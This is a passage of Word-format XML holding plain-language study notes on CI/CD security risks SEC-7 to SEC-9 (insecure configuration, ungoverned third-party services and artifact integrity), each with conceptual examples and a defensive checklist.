        <w:t>Anonymous access enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12464849" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's insecure system configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4FD3A4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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76FA1D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A Jenkins agent runs builds as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71662BEF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B06442" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> if malicious code executes during the build:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450342AB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>malicious build code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29217C5B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC678F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D8AC6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5391C61D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>compromise build server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A2DDD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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E3D44" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are CI/CD tools patched? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E314C91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are default credentials removed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453420C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> unnecessary functionality disabled? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4919AB70" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are build agents hardened? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D2C2CC" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are privileged containers avoided? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48880784" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are agents isolated? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25953317" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Is Docker configured securely? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5AE8D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are Jenkins/GitLab settings hardened? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B965614" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are runners shared unnecessarily? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21710499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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA386D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-7 = Is the CI/CD infrastructure itself securely configured?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E37514" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="17BF0668">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F650B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8. CICD-SEC-8 — Ungoverned Usage of 3rd Party Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A43CAE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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B87F0F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Teams use external services in the CI/CD process without proper security governance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF1D7F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B5535" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910C010" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4F3E3" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Jenkins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D2FA5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989A129" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>SonarQube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF88207" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA1221B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Slack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA63E4C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0D74E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Docker Hub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1640A22E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A8631" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1AEA94" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Every external integration increases the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A6155F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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E9CAD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A developer adds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D7769" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Random third-party GitHub Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7ACA77" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>to the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B61079" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>The organization has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2B23F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>No approval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CEEE2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>No security review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A851F54" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>No allowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100FC172" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The action could potentially access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CE36B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D51C5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6BA7F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Build environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D825E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EF6BC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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C790B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Someone connects a third-party deployment service to Jenkins and gives it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC6074" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D2A98" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>without security review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07C4A4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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0F7CA0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">What third-party services are integrated? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CF70B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are integrations approved? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E30A5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are third-party plugins reviewed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D0701" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are permissions limited? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B27BC4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are OAuth tokens scoped? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542F635" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are external actions/plugins trusted? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EC073A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are unused integrations removed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE09D9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are third-party services monitored/governed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2C9223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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF2D6B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-8 = Are external tools/services used by the pipeline properly controlled?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AE4082" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="16657FF4">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED7E83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9. CICD-SEC-9 — Improper Artifact Integrity Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B45C6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lastRenderedPageBreak/>
        <w:t>Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50A322" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The organization doesn't properly verify that the artifact being deployed is the legitimate artifact that was built.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F1FE6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">This is about </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>artifact trust</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC79E83" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Think:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418C6E8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6593786A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F54F2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EAAAF8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ADCAE1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CEAF7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEB54E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE7EA8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD9653" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CB6D5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>You need confidence that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEEA8F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The app.jar deployed to production is the same legitimate artifact produced by the trusted build.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30696058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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1D520" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Build creates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A1F91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>app-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3419C994" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>It gets uploaded to Nexus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C570CAE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Later someone replaces it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E47DB" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>malicious app-1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77674B76" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>The deployment pipeline doesn't verify its checksum/signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6E2D4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>It deploys the malicious artifact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8CDAE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Another example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF79746" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Build produces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64735D6D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Docker image: myapp:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D40852" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Deployment simply pulls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395016F1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
